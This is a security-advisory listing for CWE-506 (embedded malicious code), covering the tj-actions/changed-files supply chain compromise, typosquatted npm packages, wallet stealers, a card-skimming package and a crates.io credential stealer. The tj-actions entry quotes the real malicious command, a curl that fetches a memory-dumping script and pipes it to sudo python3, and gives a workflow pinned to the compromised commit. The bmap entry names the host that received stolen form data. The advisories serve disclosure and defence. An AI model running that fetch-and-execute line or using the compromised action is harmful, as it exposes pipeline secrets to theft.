CWE-506
Allowed-with-ReviewEmbedded Malicious Code
Abstraction: Class · Status: Incomplete
The product contains code that appears to be malicious in nature.
525 vulnerabilities reference this CWE, most recent first.
GHSA-MRRH-FWG8-R2C3
Vulnerability from github – Published: 2025-03-15 06:30 – Updated: 2025-10-22 19:29Summary
A supply chain attack compromised the tj-actions/changed-files GitHub Action, impacting over 23,000 repositories. Attackers retroactively modified multiple version tags to reference a malicious commit, exposing CI/CD secrets in workflow logs. The vulnerability existed between March 14 and March 15, 2025, and has since been mitigated. This poses a significant risk of unauthorized access to sensitive information.
This has been patched in v46.0.1.
Details
The attack involved modifying the tj-actions/changed-files GitHub Action to execute a malicious Python script. This script extracted secrets from the Runner Worker process memory and printed them in GitHub Actions logs, making them publicly accessible in repositories with public workflow logs.
Key Indicators of Compromise (IoC):
- Malicious commit: 0e58ed8671d6b60d0890c21b07f8835ace038e67
- Retroactively updated tags pointing to the malicious commit:
v1.0.0: 0e58ed8671d6b60d0890c21b07f8835ace038e67v35.7.7-sec: 0e58ed8671d6b60d0890c21b07f8835ace038e67v44.5.1: 0e58ed8671d6b60d0890c21b07f8835ace038e67
Malicious Code Execution:
The malicious script downloaded and executed a Python script that scanned memory for secrets, base64-encoded them, and logged them in the build logs:
B64_BLOB=`curl -sSf https://gist.githubusercontent.com/nikitastupin/30e525b776c409e03c2d6f328f254965/raw/memdump.py | sudo python3`
This script targeted the Runner Worker process, extracting and exfiltrating its memory contents.
Proof of Concept (PoC)
Steps to Reproduce:
- Create a GitHub Actions workflow using the tj-actions/changed-files action:
name: "tj-action changed-files incident"
on:
pull_request:
branches:
- main
jobs:
changed_files:
runs-on: ubuntu-latest
steps:
- name: Get changed files
id: changed-files
uses: tj-actions/changed-files@0e58ed8671d6b60d0890c21b07f8835ace038e67
- Run the workflow and inspect the logs in the Actions tab.
- Vulnerable workflows may display secrets in the logs.
Detection:
Analyze network traffic using Harden-Runner, which detects unauthorized outbound requests to:
- gist.githubusercontent.com
Live reproduction logs:
🔗 Harden-Runner Insights
This attack was detected by StepSecurity when anomaly detection flagged an unauthorized outbound network call to gist.githubusercontent.com.
Duration of Vulnerability
The vulnerability was active between March 14 and March 15, 2025.
Action Required
- Review your workflows executed between March 14 and March 15:
- Check the changed-files section for unexpected output.
- Decode suspicious output using the following command:
echo 'xxx' | base64 -d | base64 -d -
If the output contains sensitive information (e.g., tokens or secrets), revoke and rotate those secrets immediately.
-
Update workflows referencing the compromised commit:
-
If your workflows reference the malicious commit directly by its SHA, update them immediately to avoid using the compromised version.
-
Tagged versions:
-
If you are using tagged versions (e.g.,
v35,v44.5.1), no action is required as these tags have been updated and are now safe to use. -
Rotate potentially exposed secrets:
- As a precaution, rotate any secrets that may have been exposed during this timeframe to ensure the continued security of your workflows.
Impact
- Type of vulnerability: Supply chain attack, Secrets exposure, Information leakage
- Who is impacted:
- Over 23,000 repositories using tj-actions/changed-files.
- Organizations with public repositories are at the highest risk, as their logs may already be compromised.
- Potential consequences:
- Theft of CI/CD secrets (API keys, cloud credentials, SSH keys).
- Unauthorized access to source code, infrastructure, and production environments.
- Credential leaks in public repositories, enabling further supply chain attacks.
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 45.0.7"
},
"package": {
"ecosystem": "GitHub Actions",
"name": "tj-actions/changed-files"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "46.0.1"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-30066"
],
"database_specific": {
"cwe_ids": [
"CWE-506"
],
"github_reviewed": true,
"github_reviewed_at": "2025-03-15T16:39:06Z",
"nvd_published_at": "2025-03-15T06:15:12Z",
"severity": "HIGH"
},
"details": "### Summary \nA supply chain attack compromised the **tj-actions/changed-files** GitHub Action, impacting over 23,000 repositories. Attackers retroactively modified multiple version tags to reference a malicious commit, exposing CI/CD secrets in workflow logs. The vulnerability existed between **March 14 and March 15, 2025**, and has since been mitigated. This poses a significant risk of unauthorized access to sensitive information.\n\nThis has been patched in [v46.0.1](https://github.com/tj-actions/changed-files/releases/tag/v46.0.1).\n\n### Details \nThe attack involved modifying the **tj-actions/changed-files** GitHub Action to execute a malicious Python script. This script extracted secrets from the Runner Worker process memory and printed them in GitHub Actions logs, making them publicly accessible in repositories with public workflow logs. \n\n#### Key Indicators of Compromise (IoC): \n- **Malicious commit**: [0e58ed8671d6b60d0890c21b07f8835ace038e67](https://github.com/tj-actions/changed-files/commit/0e58ed8671d6b60d0890c21b07f8835ace038e67) \n- **Retroactively updated tags pointing to the malicious commit**: \n - `v1.0.0`: 0e58ed8671d6b60d0890c21b07f8835ace038e67 \n - `v35.7.7-sec`: 0e58ed8671d6b60d0890c21b07f8835ace038e67 \n - `v44.5.1`: 0e58ed8671d6b60d0890c21b07f8835ace038e67 \n\n#### Malicious Code Execution: \nThe malicious script downloaded and executed a Python script that scanned memory for secrets, base64-encoded them, and logged them in the build logs: \n```\nB64_BLOB=`curl -sSf https://gist.githubusercontent.com/nikitastupin/30e525b776c409e03c2d6f328f254965/raw/memdump.py | sudo python3`\n```\n\nThis script targeted the **Runner Worker process**, extracting and exfiltrating its memory contents. \n\n### Proof of Concept (PoC) \n#### Steps to Reproduce: \n1. Create a GitHub Actions workflow using the **tj-actions/changed-files** action: \n\n```yml\nname: \"tj-action changed-files incident\"\non:\n pull_request:\n branches:\n - main\njobs:\n changed_files:\n runs-on: ubuntu-latest\n steps:\n - name: Get changed files\n id: changed-files\n uses: tj-actions/changed-files@0e58ed8671d6b60d0890c21b07f8835ace038e67\n```\n2. Run the workflow and inspect the logs in the Actions tab. \n3. Vulnerable workflows may display secrets in the logs. \n\n#### Detection: \nAnalyze network traffic using [Harden-Runner](https://github.com/step-security/harden-runner), which detects unauthorized outbound requests to: \n- `gist.githubusercontent.com` \n\nLive reproduction logs: \n\ud83d\udd17 [Harden-Runner Insights](https://app.stepsecurity.io/github/step-security/github-actions-goat/actions/runs/13866127357) \n\nThis attack was detected by **StepSecurity** when anomaly detection flagged an unauthorized outbound network call to `gist.githubusercontent.com`. \n\n### Duration of Vulnerability \nThe vulnerability was active between **March 14 and March 15, 2025**. \n\n### Action Required \n1. **Review your workflows executed between March 14 and March 15**: \n - Check the **changed-files** section for unexpected output. \n - Decode suspicious output using the following command: \n ```\n echo \u0027xxx\u0027 | base64 -d | base64 -d\n ```\n - If the output contains sensitive information (e.g., tokens or secrets), revoke and rotate those secrets immediately. \n\n2. **Update workflows referencing the compromised commit**: \n - If your workflows reference the malicious commit directly by its SHA, update them immediately to avoid using the compromised version. \n\n3. **Tagged versions**: \n - If you are using tagged versions (e.g., `v35`, `v44.5.1`), no action is required as these tags have been updated and are now safe to use. \n\n4. **Rotate potentially exposed secrets**: \n - As a precaution, rotate any secrets that may have been exposed during this timeframe to ensure the continued security of your workflows. \n\n### Impact \n- **Type of vulnerability**: Supply chain attack, Secrets exposure, Information leakage \n- **Who is impacted**: \n - Over 23,000 repositories using **tj-actions/changed-files**. \n - Organizations with public repositories are at the highest risk, as their logs may already be compromised. \n- **Potential consequences**: \n - Theft of CI/CD secrets (API keys, cloud credentials, SSH keys). \n - Unauthorized access to source code, infrastructure, and production environments. \n - Credential leaks in public repositories, enabling further supply chain attacks.",
"id": "GHSA-mrrh-fwg8-r2c3",
"modified": "2025-10-22T19:29:00Z",
"published": "2025-03-15T06:30:34Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/tj-actions/changed-files/security/advisories/GHSA-mw4p-6x4p-x5m5"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-30066"
},
{
"type": "WEB",
"url": "https://github.com/espressif/arduino-esp32/issues/11127"
},
{
"type": "WEB",
"url": "https://github.com/modal-labs/modal-examples/issues/1100"
},
{
"type": "WEB",
"url": "https://github.com/tj-actions/changed-files/issues/2463"
},
{
"type": "WEB",
"url": "https://github.com/tj-actions/changed-files/issues/2464"
},
{
"type": "WEB",
"url": "https://github.com/tj-actions/changed-files/issues/2477"
},
{
"type": "WEB",
"url": "https://github.com/chains-project/maven-lockfile/pull/1111"
},
{
"type": "WEB",
"url": "https://github.com/rackerlabs/genestack/pull/903"
},
{
"type": "WEB",
"url": "https://sysdig.com/blog/detecting-and-mitigating-the-tj-actions-changed-files-supply-chain-attack-cve-2025-30066"
},
{
"type": "WEB",
"url": "https://web.archive.org/web/20250315060250/https://github.com/tj-actions/changed-files/issues/2463"
},
{
"type": "WEB",
"url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-30066"
},
{
"type": "WEB",
"url": "https://www.cisa.gov/news-events/alerts/2025/03/18/supply-chain-compromise-third-party-github-action-cve-2025-30066"
},
{
"type": "WEB",
"url": "https://www.stepsecurity.io/blog/harden-runner-detection-tj-actions-changed-files-action-is-compromised"
},
{
"type": "WEB",
"url": "https://www.stream.security/post/github-action-supply-chain-attack-exposes-secrets-what-you-need-to-know-and-how-to-respond"
},
{
"type": "WEB",
"url": "https://www.sweet.security/blog/cve-2025-30066-tj-actions-supply-chain-attack"
},
{
"type": "WEB",
"url": "https://www.wiz.io/blog/github-action-tj-actions-changed-files-supply-chain-attack-cve-2025-30066"
},
{
"type": "WEB",
"url": "https://semgrep.dev/blog/2025/popular-github-action-tj-actionschanged-files-is-compromised"
},
{
"type": "WEB",
"url": "https://news.ycombinator.com/item?id=43368870"
},
{
"type": "WEB",
"url": "https://news.ycombinator.com/item?id=43367987"
},
{
"type": "WEB",
"url": "https://github.com/tj-actions/changed-files/releases/tag/v46.0.1"
},
{
"type": "WEB",
"url": "https://github.com/tj-actions/changed-files/blob/45fb12d7a8bedb4da42342e52fe054c6c2c3fd73/README.md?plain=1#L20-L28"
},
{
"type": "PACKAGE",
"url": "https://github.com/tj-actions/changed-files"
},
{
"type": "WEB",
"url": "https://github.com/github/docs/blob/962a1c8dccb8c0f66548b324e5b921b5e4fbc3d6/content/actions/security-for-github-actions/security-guides/security-hardening-for-github-actions.md?plain=1#L191-L193"
},
{
"type": "WEB",
"url": "https://blog.gitguardian.com/compromised-tj-actions"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N/E:H",
"type": "CVSS_V3"
}
],
"summary": "tj-actions changed-files through 45.0.7 allows remote attackers to discover secrets by reading actions logs."
}
GHSA-MVCH-RH6H-2M47
Vulnerability from github – Published: 2020-09-11 21:10 – Updated: 2021-10-01 14:09All versions of equest typosquatted a popular package of similar name and tracked users who had installed the incorrect package. The package uploaded information to a remote server including: name of the downloaded package, name of the intended package, the Node version and whether the process was running as sudo. There is no further compromise.
Recommendation
Remove the package from your dependencies and always ensure package names are typed correctly upon installation.
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "equest"
},
"ranges": [
{
"events": [
{
"introduced": "0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [],
"database_specific": {
"cwe_ids": [
"CWE-506"
],
"github_reviewed": true,
"github_reviewed_at": "2020-08-31T18:38:45Z",
"nvd_published_at": null,
"severity": "CRITICAL"
},
"details": "All versions of `equest` typosquatted a popular package of similar name and tracked users who had installed the incorrect package. The package uploaded information to a remote server including: name of the downloaded package, name of the intended package, the Node version and whether the process was running as sudo. There is no further compromise.\n\n\n## Recommendation\n\nRemove the package from your dependencies and always ensure package names are typed correctly upon installation.",
"id": "GHSA-mvch-rh6h-2m47",
"modified": "2021-10-01T14:09:54Z",
"published": "2020-09-11T21:10:29Z",
"references": [
{
"type": "WEB",
"url": "https://www.npmjs.com/advisories/867"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "Malicious Package in equest"
}
GHSA-MWCV-M549-5CM8
Vulnerability from github – Published: 2018-11-01 14:47 – Updated: 2023-09-11 18:23The node-tkinter package is a piece of malware that steals environment variables and sends them to attacker controlled locations.
All versions have been unpublished from the npm registry.
Recommendation
As this package is malware, if you find it installed in your environment, the real security concern is determining how it got there.
If you have found this installed in your environment, you should: 1. Delete the package 2. Clear your npm cache 3. Ensure it is not present in any other package.json files on your system 4. Regenerate your registry credentials, tokens, and any other sensitive credentials that may have been present in your environment variables.
Additionally, any service which may have been exposed via credentials in your environment variables, such as a database, should be reviewed for indicators of compromise as well.
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 1.0.2"
},
"package": {
"ecosystem": "npm",
"name": "node-tkinter"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.0.3"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2017-16062"
],
"database_specific": {
"cwe_ids": [
"CWE-506"
],
"github_reviewed": true,
"github_reviewed_at": "2020-06-16T21:47:28Z",
"nvd_published_at": null,
"severity": "HIGH"
},
"details": "The `node-tkinter` package is a piece of malware that steals environment variables and sends them to attacker controlled locations. \n\nAll versions have been unpublished from the npm registry.\n\n\n## Recommendation\n\n\n\nAs this package is malware, if you find it installed in your environment, the real security concern is determining how it got there. \n\nIf you have found this installed in your environment, you should:\n1. Delete the package\n2. Clear your npm cache\n3. Ensure it is not present in any other package.json files on your system\n4. Regenerate your registry credentials, tokens, and any other sensitive credentials that may have been present in your environment variables. \n\nAdditionally, any service which may have been exposed via credentials in your environment variables, such as a database, should be reviewed for indicators of compromise as well.",
"id": "GHSA-mwcv-m549-5cm8",
"modified": "2023-09-11T18:23:24Z",
"published": "2018-11-01T14:47:43Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2017-16062"
},
{
"type": "ADVISORY",
"url": "https://github.com/advisories/GHSA-mwcv-m549-5cm8"
},
{
"type": "WEB",
"url": "https://www.npmjs.com/advisories/501"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
}
],
"summary": "node-tkinter is malware"
}
GHSA-P33Q-W45H-2HCJ
Vulnerability from github – Published: 2020-09-02 18:30 – Updated: 2021-10-01 13:44All versions of 4equest typosquatted a popular package of similar name and tracked users who had installed the incorrect package. The package uploaded information to a remote server including: name of the downloaded package, name of the intended package, the Node version and whether the process was running as sudo. There is no further compromise.
Recommendation
Remove the package from your dependencies and always ensure package names are typed correctly upon installation.
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "4equest"
},
"ranges": [
{
"events": [
{
"introduced": "0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [],
"database_specific": {
"cwe_ids": [
"CWE-506"
],
"github_reviewed": true,
"github_reviewed_at": "2020-08-31T18:37:37Z",
"nvd_published_at": null,
"severity": "CRITICAL"
},
"details": "All versions of `4equest` typosquatted a popular package of similar name and tracked users who had installed the incorrect package. The package uploaded information to a remote server including: name of the downloaded package, name of the intended package, the Node version and whether the process was running as sudo. There is no further compromise.\n\n\n## Recommendation\n\nRemove the package from your dependencies and always ensure package names are typed correctly upon installation.",
"id": "GHSA-p33q-w45h-2hcj",
"modified": "2021-10-01T13:44:09Z",
"published": "2020-09-02T18:30:03Z",
"references": [
{
"type": "WEB",
"url": "https://www.npmjs.com/advisories/837"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "Malicious Package in 4equest"
}
GHSA-P3JX-G34V-Q56J
Vulnerability from github – Published: 2020-09-03 22:54 – Updated: 2021-09-30 16:31Version 0.8.0 contained malicious code. The package targeted the Ethereum cryptocurrency and performed transactions to wallets not controlled by the user.
Recommendation
Remove the package from your environment. Ensure no Ethereum funds were compromised.
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "j3-sha3"
},
"ranges": [
{
"events": [
{
"introduced": "0.0.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [],
"database_specific": {
"cwe_ids": [
"CWE-506"
],
"github_reviewed": true,
"github_reviewed_at": "2020-08-31T18:53:26Z",
"nvd_published_at": null,
"severity": "CRITICAL"
},
"details": "Version 0.8.0 contained malicious code. The package targeted the Ethereum cryptocurrency and performed transactions to wallets not controlled by the user.\n\n\n## Recommendation\n\nRemove the package from your environment. Ensure no Ethereum funds were compromised.",
"id": "GHSA-p3jx-g34v-q56j",
"modified": "2021-09-30T16:31:54Z",
"published": "2020-09-03T22:54:02Z",
"references": [
{
"type": "WEB",
"url": "https://www.npmjs.com/advisories/1276"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "Malicious Package in j3-sha3"
}
GHSA-P4MF-4QVH-W8G5
Vulnerability from github – Published: 2020-09-04 15:41 – Updated: 2021-10-01 20:39All versions of this package contained malware. The package was designed to find and exfiltrate cryptocurrency wallets.
Recommendation
Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.
The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "bitcionjslib"
},
"ranges": [
{
"events": [
{
"introduced": "0.0.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [],
"database_specific": {
"cwe_ids": [
"CWE-506"
],
"github_reviewed": true,
"github_reviewed_at": "2020-08-31T18:56:25Z",
"nvd_published_at": null,
"severity": "CRITICAL"
},
"details": "All versions of this package contained malware. The package was designed to find and exfiltrate cryptocurrency wallets.\n\n\n## Recommendation\n\nAny computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.\n\nThe package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.",
"id": "GHSA-p4mf-4qvh-w8g5",
"modified": "2021-10-01T20:39:41Z",
"published": "2020-09-04T15:41:42Z",
"references": [
{
"type": "WEB",
"url": "https://www.npmjs.com/advisories/1361"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
"type": "CVSS_V3"
}
],
"summary": "Malicious Package in bitcionjslib"
}
GHSA-P59G-6CQR-M73W
Vulnerability from github – Published: 2020-09-03 20:45 – Updated: 2021-09-29 20:33Version 1.0.3 of bmap contained malicious code. The code when executed in the browser would enumerate password, cvc, cardnumber fields from forms and send the extracted values to https://js-metrics.com/minjs.php?pl=
Recommendation
If version 1.0.3 of this module is found installed you will want to replace it with a version before or after 1.0.3. In addition to replacing the installed module, you will also want to evaluate your application to determine whether or not user data was compromised.
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "bmap"
},
"versions": [
"1.0.3"
]
}
],
"aliases": [],
"database_specific": {
"cwe_ids": [
"CWE-506"
],
"github_reviewed": true,
"github_reviewed_at": "2020-08-31T18:50:35Z",
"nvd_published_at": null,
"severity": "CRITICAL"
},
"details": "Version 1.0.3 of `bmap` contained malicious code. The code when executed in the browser would enumerate password, cvc, cardnumber fields from forms and send the extracted values to `https://js-metrics.com/minjs.php?pl=`\n\n\n## Recommendation\n\nIf version 1.0.3 of this module is found installed you will want to replace it with a version before or after 1.0.3. In addition to replacing the installed module, you will also want to evaluate your application to determine whether or not user data was compromised.",
"id": "GHSA-p59g-6cqr-m73w",
"modified": "2021-09-29T20:33:18Z",
"published": "2020-09-03T20:45:27Z",
"references": [
{
"type": "WEB",
"url": "https://www.npmjs.com/advisories/1192"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "Malicious Package in bmap"
}
GHSA-P5P2-RHC3-WMF3
Vulnerability from github – Published: 2020-09-03 17:03 – Updated: 2021-10-04 15:40All versions of this package contained malware. The package was designed to find and exfiltrate cryptocurrency wallets.
Recommendation
Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.
The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "siganle"
},
"ranges": [
{
"events": [
{
"introduced": "0.0.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [],
"database_specific": {
"cwe_ids": [
"CWE-506"
],
"github_reviewed": true,
"github_reviewed_at": "2020-08-31T18:58:17Z",
"nvd_published_at": null,
"severity": "CRITICAL"
},
"details": "All versions of this package contained malware. The package was designed to find and exfiltrate cryptocurrency wallets.\n\n\n## Recommendation\n\nAny computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.\n\nThe package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.",
"id": "GHSA-p5p2-rhc3-wmf3",
"modified": "2021-10-04T15:40:00Z",
"published": "2020-09-03T17:03:31Z",
"references": [
{
"type": "WEB",
"url": "https://www.npmjs.com/advisories/1409"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
"type": "CVSS_V3"
}
],
"summary": "Malicious Package in siganle"
}
GHSA-P5VF-5754-X7P3
Vulnerability from github – Published: 2026-02-13 21:02 – Updated: 2026-02-13 21:02It appeared to be typosquatting existing crate polymarket-client-sdk (sdks vs sdk) and attempting to steal credentials from local files.
The malicious crate had 1 version published on 2026-02-09 and had been downloaded only 33 times. There were no crates depending on this crate on crates.io.
Thanks to Roland Peelen for finding and reporting this to the crates.io team!
{
"affected": [
{
"package": {
"ecosystem": "crates.io",
"name": "polymarket-client-sdks"
},
"ranges": [
{
"events": [
{
"introduced": "0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [],
"database_specific": {
"cwe_ids": [
"CWE-506"
],
"github_reviewed": true,
"github_reviewed_at": "2026-02-13T21:02:38Z",
"nvd_published_at": null,
"severity": "CRITICAL"
},
"details": "It appeared to be typosquatting existing crate [`polymarket-client-sdk`](https://crates.io/crates/polymarket-client-sdk) (`sdks` vs `sdk`) and attempting to steal credentials from local files.\n\nThe malicious crate had 1 version published on 2026-02-09 and had been downloaded only 33 times. There were no crates depending on this crate on crates.io.\n\nThanks to Roland Peelen for finding and reporting this to the crates.io team!",
"id": "GHSA-p5vf-5754-x7p3",
"modified": "2026-02-13T21:02:38Z",
"published": "2026-02-13T21:02:38Z",
"references": [
{
"type": "WEB",
"url": "https://rustsec.org/advisories/RUSTSEC-2026-0011.html"
}
],
"schema_version": "1.4.0",
"severity": [],
"summary": "`polymarket-client-sdks` was removed from crates.io for malicious code"
}
GHSA-P62R-JF56-H429
Vulnerability from github – Published: 2020-09-03 20:29 – Updated: 2020-08-31 18:49All versions of evil-package contain malicious code. The package uploads the contents of process.env to example.com/log.
Recommendation
Remove the package from your environment. Given the host where the information was uploaded to there is no further indication of compromise.
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "evil-package"
},
"ranges": [
{
"events": [
{
"introduced": "0.0.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [],
"database_specific": {
"cwe_ids": [
"CWE-506"
],
"github_reviewed": true,
"github_reviewed_at": "2020-08-31T18:49:31Z",
"nvd_published_at": null,
"severity": "CRITICAL"
},
"details": "All versions of `evil-package` contain malicious code. The package uploads the contents of `process.env` to `example.com/log`.\n\n\n## Recommendation\n\nRemove the package from your environment. Given the host where the information was uploaded to there is no further indication of compromise.",
"id": "GHSA-p62r-jf56-h429",
"modified": "2020-08-31T18:49:31Z",
"published": "2020-09-03T20:29:58Z",
"references": [
{
"type": "WEB",
"url": "https://www.npmjs.com/advisories/1162"
}
],
"schema_version": "1.4.0",
"severity": [],
"summary": "Malicious Package in evil-package"
}
Mitigation
Remove the malicious code and start an effort to ensure that no more malicious code exists. This may require a detailed review of all code, as it is possible to hide a serious attack in only one or two lines of code. These lines may be located almost anywhere in an application and may have been intentionally obfuscated by the attacker.
CAPEC-442: Infected Software
An adversary adds malicious logic, often in the form of a computer virus, to otherwise benign software. This logic is often hidden from the user of the software and works behind the scenes to achieve negative impacts. Many times, the malicious logic is inserted into empty space between legitimate code, and is then called when the software is executed. This pattern of attack focuses on software already fielded and used in operation as opposed to software that is still under development and part of the supply chain.
CAPEC-448: Embed Virus into DLL
An adversary tampers with a DLL and embeds a computer virus into gaps between legitimate machine instructions. These gaps may be the result of compiler optimizations that pad memory blocks for performance gains. The embedded virus then attempts to infect any machine which interfaces with the product, and possibly steal private data or eavesdrop.
CAPEC-636: Hiding Malicious Data or Code within Files
Files on various operating systems can have a complex format which allows for the storage of other data, in addition to its contents. Often this is metadata about the file, such as a cached thumbnail for an image file. Unless utilities are invoked in a particular way, this data is not visible during the normal use of the file. It is possible for an attacker to store malicious data or code using these facilities, which would be difficult to discover.